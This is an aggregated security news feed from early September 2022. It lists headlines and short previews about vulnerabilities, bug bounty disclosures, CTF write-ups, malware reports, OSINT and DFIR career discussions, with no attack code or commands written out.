    SecWiki News 2022-09-06 Review
    [HTB] Chatterbox Writeup by 0x584a OPSWAT 2022 年恶意软件分析调查报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-06 Review
    [HTB] Chatterbox Writeup by 0x584a OPSWAT 2022 年恶意软件分析调查报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Interview: Baptiste Robert
    Hacker, disinformation fighter, Elliot Continue reading on Medium »
    OSINT Crypto Quiz
    I came across this OSINT quiz by OSINT Dojo a while ago, but i’ve only just gotten round to having a look at it. Continue reading on Medium »
    Association Matrix
    An association matrix is an analysis technique used in intelligence to identify associations between various points of interest. This can… Continue reading on Medium »
    The rise of TikTok as an OSINT tool
    As TikTok continues to surpass other social media platforms as the go-to app for information as well as entertainment, we take a closer… Continue reading on Medium »
    Trains, avions, bateaux, trois sites pour suivre le trafic mondial en temps réel
    Continue reading on Medium »
  • Open

    Vulnerability Management for Go
    Article URL: https://go.dev/blog/vuln Comments URL: https://news.ycombinator.com/item?id=32737886 Points: 300 # Comments: 51
    Vulnerability: Are LucidCharts Safe When Shared to Confluence?
    Article URL: https://reco.ai/vulnerability-report-lucid-charts/ Comments URL: https://news.ycombinator.com/item?id=32732280 Points: 1 # Comments: 0
  • Open

    FFUF : Tooling Series
    Hey guys it’s me Uday and today i’ve found a very interesting tool and i would like to share information that i’ve collected, so let’s… Continue reading on Medium »
  • Open

    FFUF : Tooling Series
    Hey guys it’s me Uday and today i’ve found a very interesting tool and i would like to share information that i’ve collected, so let’s… Continue reading on Medium »
  • Open

    Mirai Variant MooBot Targeting D-Link Devices
    Attackers are leveraging known vulnerabilities in D-Link devices to deliver MooBot, a Mirai variant, potentially leading to further DDoS attacks. The post Mirai Variant MooBot Targeting D-Link Devices appeared first on Unit 42.
  • Open

    疯狂的SOVA:Android银行木马“新标杆”
    安全研究人员还发现SOVA还增加了一个令人意想不到的新功能——可对手机等移动端进行数据加密和勒索攻击。
    FreeBuf早报 | TikTok否认用户数据源代码泄露;Ins因侵犯儿童隐私被罚4亿欧元
    爱尔兰监管机构以侵犯儿童隐私对Instagram罚款 4.05 亿欧元 ,Meta 表示将会提起上诉。
    又见天价罚单,Meta违反GDPR被罚4亿美元
    9月6日,Meta违反了GDPR被罚款约4亿美元的新闻迅速引爆了科技圈。
    人人皆是黑客?EvilProxy推出一键反向代理服务
    一旦EvilProxy宣传的功能成为现实,那么人人皆可成为黑客,企业安全将面临巨大的网络钓鱼攻击威胁。
    CICD管道中的代码注入漏洞影响Google、Apache开源GitHub项目
    CI/CD管道中存在安全漏洞,攻击者可以利用这些漏洞来破坏开发过程并在部署时推出恶意代码。近日,研究人员在Apache和Google的两个非常流行的开源项目的GitHub环境中发现了一对安全漏洞,可用于秘密修改项目源代码、窃取机密并在组织内部横向移动。据Legit Security的研究人员称,这些问题是持续集成/持续交付(CI/CD)缺陷,可能威胁到全球更多的开源项目,目前主要影响Google
    新兴的跨平台BianLian勒索软件攻击正在提速
    新兴跨平台BianLian勒索软件的运营商本月增加了他们的命令和控制(C2)基础设施,这一发展暗示着该组织的运营节奏正在提速。使用Go编程语言编写的BianLian勒索软件于2022年7月中旬首次被发现,截至9月1日已声称有15个受害组织。值得注意的是,这一新兴的双重勒索勒索软件家族与同名的Android银行木马没有联系,后者主要针对移动银行和加密货币应用程序窃取敏感信息。安全研究人员Ben Ar
    Chisel-Strike:一款功能强大的.NET异或XOR加密CobaltStrike Aggressor实现
    在该工具的帮助下,我们可以实现更快速的代理以及更加高级的Socks5功能。
  • Open

    一种快速的无代替模型的黑盒对抗攻击算法 SurFree
    作者:seven010@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/XYpeT7tdVD7l-LfFrhDm-g 今天笔者给大家推荐一篇高效的基于决策的黑盒对抗攻击算法的文章——SurFree: a fast surrogate-free black-box attack,目前该工作已被CVPR2021录用。 论文地址:https://arx...
  • Open

    一种快速的无代替模型的黑盒对抗攻击算法 SurFree
    作者:seven010@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/XYpeT7tdVD7l-LfFrhDm-g 今天笔者给大家推荐一篇高效的基于决策的黑盒对抗攻击算法的文章——SurFree: a fast surrogate-free black-box attack,目前该工作已被CVPR2021录用。 论文地址:https://arx...

  • Open

    I patched my Slack client to keep "Oops" messages others delete
    submitted by /u/sh0n1z [link] [comments]
    Anatomy of an exploit in Windows win32k - CVE-2022-21882 - Avira Blog
    submitted by /u/jeandrew [link] [comments]
    Shielder - How to Decrypt Manage Engine PMP Passwords for Fun and Domain Admin - a Red Teaming Tale
    submitted by /u/smaury [link] [comments]
    Simple IBM i (AS/400) hacking
    submitted by /u/buherator [link] [comments]
    Hacking my Helium Crypto Miner
    submitted by /u/wez32 [link] [comments]
    Walkthrough of an unauthenticated RCE affecting pfBlockerNG <= 2.1.4_26 (CVE-2022-31814)
    submitted by /u/IHTeam [link] [comments]
    CVE-2022-30190, AKA Follina, Uses Macro-less Word Docs to Drop RCE Files
    submitted by /u/anyore909 [link] [comments]
    PoC: resolving dynamically System Service Numbers (SSN) for syscalling in VBA (x64) using FreshyCalls technique
    submitted by /u/gid0rah [link] [comments]
  • Open

    No password length restriction in reset password endpoint at http://suppliers.mtn.cm
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1285694
    firebase credentials leaks @ https://mtnhottseat.mtn.com.gh
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1351326
    firebase credentials leaks @ https://mpulse.mtnonline.com
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1351329
    CVE-2021-38314 @ https://www.mtn.ci
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1351338
    CVE-2021-38314 @ https://www.mtn.co.rw
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1351341
    Exposed gitlab repo at https://adammanco.mtn.com/api/v4/projects
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1351359
    Information disclosure through django debug mode
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1434276
    API key (api.semrush.com) leak in JS-file
    Semrush disclosed a bug submitted by a_d_a_m: https://hackerone.com/reports/1218754 - Bounty: $500
  • Open

    MyComputerCareer instructor is curious about how FS compare in terms of undelete
    So I'm an adjunct instructor for My Computer Career, A+ and Linux Essentials. I have done a little tiny bit of computer forensics in my life. I am preparing a slide to teach the students some "above and beyond" information about computer forensics, mainly undeleting files. I've played with PhotoRec, for instance, and I remember in the 90s the undelete tool of Norton Utilities. So as I am studying up about the various filesystems, I am noting the differences between how ext2, ext3/4, ntfs and fat32 delete files. For those who do a lot of undelete or forensics with drives, would you be willing to give your opinion as to the filesystem that makes file undeletion the easiest? I'm thinking ext2 or FAT16/32 but I am not an expert in this field. Thanks in advance! submitted by /u/OneEyedC4t [link] [comments]
    How does Volatility translate a physical frame back to it's process?
    I want to know, how does Volatility know from a memory dump to which process a physical frame belongs to? I think I'm familiar with how the OS translates a virtual address to a physical. So a virtual address space is split into pages. Each virtual address is translates to a physical address via page tables. A physical address is a memory address within a physical frame inside my memory dump. How does Volatility determine to which process a physical frame belongs to? I'm mostly interested in Windows if this makes any difference. submitted by /u/13pcfx37 [link] [comments]
    Forensic Analyst to Threat Hunter
    Hey everyone, I was wondering what your thoughts are in regards to career progression as a forensic analyst. I’m currently in the DFIR space and am a forensic analyst consultant for a decent sized company. I’m curious as to what you think would be progression in the field. Would it just to keep going on the forensic path and eat and breathe forensics? Or would going into Threat Hunting keep my career moving? Probably a debatable topic but I’m always trying to see what I need to do to keep sharp and moving in the right direction. Thanks in advance everyone. submitted by /u/thiefofalways1313 [link] [comments]
  • Open

    Shodan?
    I have a set search I do on Shodan to look for open Calibre libraries... and suddenly I noticed that the number of overall results is WAY lower. Like, there used to be dozens of results for, say, the United Kingdom. Now there's only... 16. 6 for all of Australia. Anyone else notice this? What gives? submitted by /u/look_who_it_isnt [link] [comments]
  • Open

    How do you deal with phishing incidents within your organisation
    Slightly curious to know and understand how organisations deal with phishing incidents. Typically one would assume the following: Block sender and delete all phishing emails from within the gateway Reset user password and revoke sessions Run AV scan and isolate off the network submitted by /u/securm0n [link] [comments]
    need advice for bug hunting as absolute beginner
    Hi everyone, a noob here want to be a bug bounty hunter. I have watched some youtube videos talking about how to become an ethical hacker. Most of them talk about reading writeups, doing CTFs, they tell about some websites like hacker101, tryhackme but I don't know where to begin from if know nothing about hacking. I have done little bit of coding in linux, know some very basic linux commands, used kali & ubuntu. I know core python & javascript. But talking about hacking I know nothing. Just tell me about best way to enter infosec domain for bug hunting perspective & what resources to follow. Thank you in advance your advice will be very helpful for me. ​ PS : I also don't have any knowledge about networking so recommend me a book or something. submitted by /u/gagan_anttal [link] [comments]
    SANS GDSA
    Hi, does the content for the GDSA exam get updated regularly? I mean if one did the course several years ago but didn't do the cert at the time would the current exam now be considerably different to the course subject matter from a 3-4 years ago? Thanks submitted by /u/Veedubius [link] [comments]
    Password managers
    While lastpass and 1password are the most known password managers,many suggest bitwarden here on Reddit. What makes it a better choice,beside the price?? Any thoughts on RoboForm,which is one of the oldest and fairly cheaper than the other two? submitted by /u/Giorgin07 [link] [comments]
  • Open

    O que é Pentest?
    Explicando de forma simples o que é e quais são os tipos de Pentest. Continue reading on Medium »
    Career Advice: Passing the OSCP Made Simple
    If there’s anything to take out of my blog read “START BEFORE YOU START!”. Continue reading on Medium »
    Career Advice: OSCP Made Simple
    If there is anything to take out of my blog read “START BEFORE YOU START!”. Continue reading on Medium »
  • Open

    ‍Smart Contract Security, WAF Bypassing, HTTP Parameter Pollution, Race Condition, IDOR, Web…
    No content preview
    Why broken access control is the most severe vulnerability
    Introduction Continue reading on InfoSec Write-ups »
    Timelapse from HackTheBox — Detailed Walkthrough
    No content preview
    Phoenix Challenges — Stack One
    No content preview
    Passing a Role to AWS CloudFormation to Escalate Privileges
    No content preview
    Pen #007: Wi-Fi Hacking 101
    No content preview
    Bayanay — Python Wardriving Tool
    No content preview
  • Open

    ‍Smart Contract Security, WAF Bypassing, HTTP Parameter Pollution, Race Condition, IDOR, Web…
    No content preview
    Why broken access control is the most severe vulnerability
    Introduction Continue reading on InfoSec Write-ups »
    Timelapse from HackTheBox — Detailed Walkthrough
    No content preview
    Phoenix Challenges — Stack One
    No content preview
    Passing a Role to AWS CloudFormation to Escalate Privileges
    No content preview
    Pen #007: Wi-Fi Hacking 101
    No content preview
    Bayanay — Python Wardriving Tool
    No content preview
  • Open

    ‍Smart Contract Security, WAF Bypassing, HTTP Parameter Pollution, Race Condition, IDOR, Web…
    No content preview
    Why broken access control is the most severe vulnerability
    Introduction Continue reading on InfoSec Write-ups »
    Timelapse from HackTheBox — Detailed Walkthrough
    No content preview
    Phoenix Challenges — Stack One
    No content preview
    Passing a Role to AWS CloudFormation to Escalate Privileges
    No content preview
    Pen #007: Wi-Fi Hacking 101
    No content preview
    Bayanay — Python Wardriving Tool
    No content preview
  • Open

    Google Chrome’s latest update has a security fix CVE-2022-3075
    Article URL: https://www.theverge.com/2022/9/5/23337648/google-chrome-install-update-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=32726199 Points: 5 # Comments: 0
  • Open

    Fuzzcheck: Modular, structure-aware, and feedback-driven fuzzing engine for Rust
    Article URL: https://fuzzcheck.neocities.org/introduction.html Comments URL: https://news.ycombinator.com/item?id=32726078 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-09-05 Review
    SecWiki周刊(第444期) by ourren 基于AI算法的数据库异常监测系统的设计与实现 by 路人甲 利用Nginx、Tyk Gateway API和CloudFlare防火墙隐藏C2设施 by 路人甲 内网渗透一周目小结 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-05 Review
    SecWiki周刊(第444期) by ourren 基于AI算法的数据库异常监测系统的设计与实现 by 路人甲 利用Nginx、Tyk Gateway API和CloudFlare防火墙隐藏C2设施 by 路人甲 内网渗透一周目小结 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Is this an accurate visualization of the problem with EDR visibility?
    submitted by /u/Jonathan-Todd [link] [comments]
  • Open

    Community Testing V2 of BusyChain launched — bug-hunting!
    Busy is happy to reveal the second and last long-awaited Community Testing event V2. The updated version of BusyChain testnet V3 goes… Continue reading on BusyTechnology »
    Why broken access control is the most severe vulnerability
    Introduction Continue reading on InfoSec Write-ups »
    IDOR “Insecure direct object references”, my first P1 in Bugbounty
    First Whoami : Dris R. A Security Researcher, Penetration Tester from Paris ,France. Continue reading on Medium »
    Bug Bounty for Beginners
    In the world of cyber security, there is a constant battle between white hat hackers (security researchers who identify vulnerabilities to… Continue reading on Medium »
  • Open

    FreeBuf早报 | 三星承认泄露美国客户信息;苹果零日漏洞利用市售800万欧元
    三星表示其经历了一起攻击,渗透使黑客能够访问某些数据,例如部分美国用户的姓名,联系人和人口统计信息,出生日期以及产品注册详细信息。
    WINGFUZZ SaaS:在线智能模糊测试平台
    作为国内首个模糊测试SaaS服务平台,当前已开放beta版免费注册使用。
    俄罗斯打车软件 Yandex  被黑,造成莫斯科交通堵塞
    俄罗斯打车应用程序 Yandex 遭到黑客攻击,数百名司机被“送到”莫斯科地区同一个上车点,造成了大面积交通堵塞。
    攻击源头系美国国家安全局,西北工业大学遭网络攻击事件报告发布
    西北工业大学遭网络攻击事件系美国国家安全局(NSA)所为。在针对该校的网络攻击中,NSA使用了40余种专属网络攻击武器。
    美国国税局意外泄露了 12 万纳税人机密信息
    泄露的信息源自一种名为990-T的表格,该表格主要用于非营利组织(慈善机构)或 IRA(个人退休账户) 及 SEP 账户。
  • Open

    XNX
    Continue reading on Medium »

  • Open

    ISO/IEC Standard that defines terminology for AuthN, AuthZ
    Ask NetSec, What is the ISO/IEC Standard that defines terms such as Principle, Authorisation, Authentication, User, Identity Provider, Service Provider. submitted by /u/CyberStagist [link] [comments]
    WCNA (Wireshark Certified Network Analyst)
    Has anyone taken the WCNA (Wireshark Certified Network Analyst) exam? I'd like to get an idea for how difficult the exam is. The study guide is ~1000 pages. submitted by /u/SharkByte1333 [link] [comments]
    I think I got ripped off by my company and have a low salary, Did I?
    So I am 25 year old woman and I have been working since I was 18. So I have quite some experience. I changed job to a cybersecurity company as a Technical Pre-Sales consultant for 57.000€ annually. (Munich,Germany). And I found out recently that the Account Executive that we have who has few years more experience than me earns 120k€ annually. I accepted the salary because at the time I was desperate and told them anything above 55K€ would be fine. My mistake, yes. But the difference between our salaries now is making me very dissatisfied and a bit angry. What are my options? submitted by /u/warwitchxx [link] [comments]
    Career Path Question
    Hey guys, been thinking about where I go from here for while and need some help figuring out my next move, at the moment I head up a team internally doing secops (including vulnerability management and some of the more technical security architecture) I'm not sure I want to continue heading up department but don't really want to loose out on the $$ I'm not a ciso and report into one. I was looking at furthering my technical skills and try my hand at getting into IR companies like fire-eye or the MS DART team or getting to the point where I could do purple teaming engagements non stop. I came from a technical background but have done security architecture, SOC and GRC ( I'm not cut out for GRC) my offensive security isn't up to scratch and was looking at the PNPT as a first step and portswigger academy for brushing up on my web app. if I was to dive deeper into DFIR is there anything outside of SANS (GIAC) certs / courses that match the quality? and finally but almost as important how much do guys doing IR on a retainer basis make and how much do purple teamers earn? submitted by /u/alphayun [link] [comments]
  • Open

    WPHash - Fingerprinting WordPress Plugins, now in public beta and open to feedback and collaboration
    submitted by /u/_cydave [link] [comments]
  • Open

    CyberDefenders: Exfiltrated Walkthrough
    SPOILER ALERT: THIS IS A POSSIBLE SOLUTION Continue reading on Medium »
  • Open

    How I found my first SSRF to RCE!
    Hi Guys, Continue reading on Medium »
    Mindset that made me one among Top 15 Security Researcher’s in India for 3 Consecutive Times!
    Hey All , Continue reading on Medium »
    Google Bug Bounty Program for Open Source Projects.
    Welcome future Cybersecurity Crack’s to my fifth post this time we are going to learn about the Google Bug Bounty for Open Source Projects Continue reading on Medium »
  • Open

    SecWiki News 2022-09-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Possible Hunt for Vulnerable Apache Geode Servers (CVE-2022-37021)
    Article URL: https://isc.sans.edu/diary.html?storyid=0 Comments URL: https://news.ycombinator.com/item?id=32714273 Points: 1 # Comments: 0
    Nat-Again: IRC NAT helper flaws (CVE-2022-2663)
    Article URL: https://dgl.cx/2022/08/nat-again-irc-cve-2022-2663 Comments URL: https://news.ycombinator.com/item?id=32711688 Points: 9 # Comments: 0
  • Open

    IDOR Leads To Account Takeover Without User Interaction
    MTN Group disclosed a bug submitted by theranger: https://hackerone.com/reports/1272478
  • Open

    "Living-Off-the-Blindspot", or how you can operate in EDRs' blindspot with Python
    Here's "Living-Off-the-Blindspot", or how you can operate in EDRs' blindspot with Python. If you missed my @DEFCON @AdversaryVillag talk you'll find in the post all the information and the demo videos presented. Enjoy! EDR #evasion #OST #redteaming submitted by /u/naksyn_ [link] [comments]
  • Open

    SPY NEWS: 2022 — Week 35
    Summary of the espionage-related news stories for the Week 35 (28 August-3 September) of 2022. Continue reading on Medium »
    OSINT techniques for pre-sales
    Open-source intelligence (OSINT) is the collection and analysis of data gathered from open sources (overt and publicly available sources)… Continue reading on Medium »
  • Open

    Looking for complete original Dallas TV show HD
    https://www.imdb.com/title/tt0077000/ submitted by /u/Ricardoies [link] [comments]

  • Open

    Phoenix Challenges -- Stack One
    Hi everyone, my writeup for the Phoenix CTF Challenges, Stack One is now live on my blog https://secnate.github.io/ctf/phoenix/phoenix-stack-one/ Any feedback would be most welcome! submitted by /u/ProgrammingBro123 [link] [comments]
    Browser Exploitation Introduction
    submitted by /u/soupcreamychicken [link] [comments]
    I see some PoC run Calc.exe . When sell exploit , run calc is enough or need run other things.
    submitted by /u/soupcreamychicken [link] [comments]
    Is vulns-sec market valid?
    https://vulns-sec.com/ https://twitter.com/vulns_sec submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Thick Client Pentest: Modern Approaches and Techniques: PART 1
    No content preview
    Exploiting OAuth authentication vulnerabilities Part II
    No content preview
    Hack With SQL Injection Attacks! DVWA high security — StackZero
    No content preview
  • Open

    Thick Client Pentest: Modern Approaches and Techniques: PART 1
    No content preview
    Exploiting OAuth authentication vulnerabilities Part II
    No content preview
    Hack With SQL Injection Attacks! DVWA high security — StackZero
    No content preview
  • Open

    Thick Client Pentest: Modern Approaches and Techniques: PART 1
    No content preview
    Exploiting OAuth authentication vulnerabilities Part II
    No content preview
    Hack With SQL Injection Attacks! DVWA high security — StackZero
    No content preview
  • Open

    Arti 1.0.0: Rust Tor implementation is ready for production use
    submitted by /u/sanitybit [link] [comments]
    Fun with Windows Containers - Popping Calc
    submitted by /u/sanitybit [link] [comments]
    Chromeloader browser hijacker
    submitted by /u/CyberMasterV [link] [comments]
    Practical guide for Golden SAML
    submitted by /u/sanitybit [link] [comments]
    Reviewing macOS Unified Logs
    submitted by /u/sanitybit [link] [comments]
  • Open

    TRUTHTRACER
    TRUTHTRACER: This mountain, the one with the jagged peak, at 40.378279, 46.728738 — could that be the one from the third photo? Continue reading on Medium »
    How to Find Flag on CTF.MY.ID
    ctf.my.id is indonesian ctf to celebrate indonesia’s independence day Continue reading on Medium »
    Dialogues From Atlantis Writeup
    Listen carefully, some texts hold deep secrets Continue reading on The Sleuth Sheet »
    The Open Source Intelligence Analysis Bookshelf
    This list of books is a great way to start your Open Source Intelligence learning journey. Continue reading on The Sleuth Sheet »
  • Open

    SecWiki News 2022-09-03 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-03 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Hacking Wireless Networks around the Globe.(Practical WIFI Hacking)
    How to hack wireless networks. Continue reading on System Weakness »
    Discovery of CVE-2022-35406
    On 11th April 2022, it was a regular day for me. I went to the office & started my daily activities. Continue reading on Medium »
    Youtube Impact on Bug Bounty Hunters :)
    in this part I’m going to show you the impact of Youtube on Bug Bounty Hunters with my best Bug Report … Continue reading on Medium »
    Exploiting Stack-based Buffer Overflow on Windows x64 | Step by Step explanation | Part-1
    Hello Security folks, In previous article, we came to know about CPU Registers and Understanding of Structure of Stack which will help us… Continue reading on Medium »
  • Open

    What are writing reports like?
    How long are they typically and how much time do they take up? Are they exceedingly repetetive, with little to no thought required? submitted by /u/victorMemer5 [link] [comments]
    What does a a typical career in pentesting look like?
    What will my week be like? If I love problem-solving and working for long periods of time, will I be in luck or will I simply only be needed every once in a while? If the latter is true, what do I do in between my services? What kind of social situations should I expect? Any and all feedback is greatly apprrciated, thank you! submitted by /u/victorMemer5 [link] [comments]
  • Open

    path traversal vulnerability in Grafana 8.x allows " local file read "
    MTN Group disclosed a bug submitted by a-heybati: https://hackerone.com/reports/1427086
    Unauthenticated SSRF in 3rd party module "cerdic/csstidy"
    Nextcloud disclosed a bug submitted by eg42: https://hackerone.com/reports/1595006 - Bounty: $250
    Brute force protections don't work
    Nextcloud disclosed a bug submitted by nickvergessen: https://hackerone.com/reports/1596918
    Password disclosure in initial setup of Mail App
    Nextcloud disclosed a bug submitted by anna_larch: https://hackerone.com/reports/1561471
    Federated share accepting/declining is not logged in audit log
    Nextcloud disclosed a bug submitted by rtod: https://hackerone.com/reports/1200815
    Weak/Auto Fill Password
    MTN Group disclosed a bug submitted by harrisoft: https://hackerone.com/reports/817331
  • Open

    Analysis: Situational Awareness + Timelines
    I've talked and written about timelines as an analysis process for some time, in both this blog and in my books, because I've seen time and again over the years the incredible value in approaching an investigation by developing a timeline (including mini- and micro-timelines, and overlays), rather than leaving the timeline as something to be manually created in a spreadsheet after everything else is done. Now, I know timelines can be "messy", in part because there's a LOT of activity that goes on on a system, even when it's "idle", such as Windows and application updates. This content can "muck up" a timeline and make it difficult to distill the malicious activity, particularly when discerning that malicious activity is predicated solely on the breadth of the analyst's knowledge and experi…
    LNK Builders
    I've blogged a bit...okay, a LOT...over the years on the topic of parsing LNK files, but a subject I really haven't touched on is LNK builders or generators. This is actually an interesting topic because it ties into the cybercrime economy quite nicely. What that means is that there are "initial access brokers", or "IABs", who gain and sell access to systems, and there are "RaaS" or "ransomware-as-a-service" operators who will provide ransomware EXEs and infrastructure, for a price. There are a number of other for-pay services, one of which is LNK builders. In March, 2020, the Checkpoint Research team published an article regarding the mLNK builder, which at the time was version 2.2. Reading through the article, you can see that the building includes a great deal of functionality, there's …
  • Open

    GCFA Passed 2nd of September 2022
    Dear community, I`d love to share this great achievement with you. After 3 months of hard work I was able to obtain the GCFA on the 1st attempt. I`m working in the IR team and I do have 4 years experience within the field. Nevertheless I need to admit that overall FOR 508 course was pretty exciting and I enjoyed it a lot. From my perspective the final exam was a bit harder than the 2 practice exams provided within the course, I have to say that the difficulty was raised by a notch. As mentioned multiple times before, the are primarily testing your understanding of the concepts , index/notes helps but do not rely on it completely. I would say do the training, get through the labs 2 times, use their MP3s provided to the training. Read the books and work hard, hard work pays off trust me. I wish all the best to all the people which already passed this beast and also to all the future students of this class. submitted by /u/_KATER_ [link] [comments]
  • Open

    BPF 进阶笔记(五):几种 TCP 相关的 BPF(sockops、struct_ops、header options)
    整理一些 TCP 相关的 BPF 内容,主要来自 Facebook 和 Google 的分享。 关于 “BPF 进阶笔记” 系列 平时学习和使用 BPF 时所整理。由于是笔记而非教程,因此内容不会追求连贯,有基础的 同学可作查漏补缺之用。 文中涉及的代码,如无特殊说明,均基于内核 5.10。 BPF 进阶笔记(一):BPF 程序(BPF Prog)类型详解:使用场景、函数签名、执行位置及程序示例 BPF 进阶笔记(二):BPF Map 类型详解:使用场景、程序示例 BPF 进阶笔记(三):BPF Map 内核实现 BPF 进阶笔记(四):调试 BPF 程序 BPF 进阶笔记(五):几种 TCP 相关的 BPF(sockops、struct_ops、header options) 关于 “BPF 进阶笔记” 系列 1 Socket 相关类型:sockops 1.1 技术背景 1.2 设计初衷 1.3 特点(尤其是与之前其他 BPF 程序的不同) 1.4 ops 分类 1.5 实现简介 struct bpf_sock_ops struct bpf_sock_ops_kern: tcp_call_bpf() 两种类型的 sock_ops BPF helper 函数 1.6 例子 2 TCP 拥塞控制(CC) 2.1 struct struct_ops 2.2 拥塞控制算法:C 和 BPF 实现 2.3 加载并启用新 CC 算法 通过 libbpf 加载 通过 bpftool 加载 通过 sysctl 启用 通过 setsockopt() 启用 2.4 性能 3 TCP header options 3.1 需求 3.2 例子 4 struct sk_storage:socket 的本地存储(local storage) …

  • Open

    PII Leakage via IDOR
    Greetings researchers, this is a brief writeup on one of my most recent discoveries regarding a bug bounty programme. Let’s educate… Continue reading on Medium »
    Welcome Angle Protocol!
    We are super excited to welcome Angle Protocol to the Hats ecosystem! We look forward to helping them add a layer of security to their… Continue reading on Medium »
    FUZZING 101 ..
    Hi , I am back with another blog And in this we will be learning about Fuzzing was about to write on fuzzing binaries or exe’s but Thought… Continue reading on Medium »
    The Cod Caper(Tryhackme) Walk through
    In this room of tryhackme we learn to see some enumeration and little bit about buffer overflow vulnerability. Continue reading on Medium »
    Exploiting OAuth authentication vulnerabilities Part II
    Today I will show some techniques that can be used to exploit OAuth 2.0 and possibly allow an attacker to take over the victim's account… Continue reading on InfoSec Write-ups »
    Latest Open Source Bug Bounty Projects Launched by Google to Control Supply Chain Attacks
    Last Monday, Google introduced its latest Open-Source Bug Bounty Projects, paving the way for bug bounty hunters for a payout ranging… Continue reading on Medium »
    The Database Handover | A Dumb Mistake | Critical BUG
    Hi hackers & Security Enthusiasts, I’m Saransh Saraf and this a simple bug with a critical Impact. I hope you’ll enjoy it and learn… Continue reading on Medium »
    21 cybersecurity search engines:
    1. Shodan — Search for devices connected to the internet. 2. Wigle — Database of wireless networks, with statistics. 3. Grep App — Search… Continue reading on Medium »
    39 cybersecurity news resources:
    1. IT Security Guru 2. Security Weekly 3. The Hacker News 4. Infosecurity Magazine 5. CSO Online 6. The State of Security — Tripwire 7… Continue reading on Medium »
  • Open

    Note and Documenting
    Has anyone used a software that can timestamp as your document. Something that displays a time stamp every time to press enter to a new line. submitted by /u/derekdoes1t [link] [comments]
    Nuances of the financial sector
    I've worked the majority of my career in the electricity generation space. I can tell you all about securing OT, especially power related OT. I can tell you all about the Purdue model, etc. I'm moving to a fintech/bank soon. People who have worked cybersecurity in the financial sector (banks, insurance, fintech, etc). what would you recommend learning about/reading/etc to get familiar (or even become a cybersecurity expert) in the financial sector? For example, Open Banking API worth learning about? submitted by /u/Itchy-Criticism-5470 [link] [comments]
  • Open

    Book Review: Red Team Development and Operations: A practical guide
    Red Team Development and Operations Continue reading on Medium »
  • Open

    There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities as used in the Motorola Moto E40 / Teclast T40 5G etc. - disclosure timeline is a thing of wonder
    submitted by /u/digicat [link] [comments]
    Windows Firmware Attack Surface Reduction (FASR)
    submitted by /u/sanitybit [link] [comments]
    curl’s TLS fingerprint
    submitted by /u/sanitybit [link] [comments]
    iPhone 11 w/ iBoot & iOS16 emulated on QEMU
    submitted by /u/sanitybit [link] [comments]
    GraphQL Batching Attacks: Turbo Intruder
    submitted by /u/_rs [link] [comments]
    CVE-2021-38406 or CISA KEV Catalog Lacks Accountability
    submitted by /u/chicksdigthelongrun [link] [comments]
    So You Wanna Pwn The Kernel?
    submitted by /u/_rs [link] [comments]
    Source Code Management Attack Toolkit - Supports GitHub Enterprise, GitLab Enterprise, & Bitbucket Server
    submitted by /u/sanitybit [link] [comments]
    More SRE Lessons for SOC: Release Engineering Ideas
    submitted by /u/sanitybit [link] [comments]
  • Open

    SecWiki News 2022-09-02 Review
    2022上半年网络安全漏洞态势观察 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-02 Review
    2022上半年网络安全漏洞态势观察 by ourren 更多最新文章,请访问SecWiki
  • Open

    How would you spend 5k training budget
    My Director just informed me I have 5k I can spend on training (conferences, certs, training etc) this year and I've been wanting to learn more about DFIR and eventually transition into the field. Do I try for SANs (org is a ren-isac member so there are some discounts available I believe)? Go for IACIS? Background: Higher Ed field, Bachelor's in Information Technology, CISA, CDPSE, CIPM, Sec+, SSCP, ITILv4 Foundations. I've performed one "investigation" related to misuse of funds where I observed chain of custody and imaged several Mac devices then later looked for evidence using autopsy. Thanks in advance for any advice. submitted by /u/youkoflame [link] [comments]
  • Open

    CDC- writeup
    XSS nədir?Necə çalışır? Continue reading on Medium »
    Hackbaku-Writeup
    Continue reading on Medium »
  • Open

    music and random images
    http://falsesoul.com submitted by /u/NavaShieldWasTaken [link] [comments]
    Httrack usage
    Hey folks. So after trying wget I feel its a bit of a nightmare to get working. Lot of circumstances it doesnt work or downloads in a very obscure way. Attempting to a do a super large directory using httrack but struggling to work out what is wrong. checking over the hts-log.txt file there is zero errors. previous to this I did get errors on the directory due to the implied security limitations if you are not using the param --disable-security-limits. Previous the cache claimed that files were being throttled at a specific size and there was a mismatch error. Now there are zero errors but file sizes seem to be even smaller than before. At a loss as to what is happening, is just the way this is downloading? There are circa 1200 files each of around 3GB in size. Do I need to the wait for it to "round robin" these files to be completed? Ive no idea about how the parallelism will work with this. Any insight to this would be fantastic. Thanks. submitted by /u/MaxSan [link] [comments]
  • Open

    Shellcode Injection Techniques in C#
    Process Injection in C# https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques/ submitted by /u/Potential_Waltz7400 [link] [comments]
  • Open

    Detection and Alerting: Selecting a SIEM
    Summary Basic SIEM requirements should be in place to create mature detections for a variety of log sources, including network logs, system logs, and application logs (including custom applications). This focuses on Security Operations and does not include the engineering side of SIEM management, e.g., licensing, hardware/cloud requirements, retention needs, etc. Each component of the... The post Detection and Alerting: Selecting a SIEM appeared first on TrustedSec.
  • Open

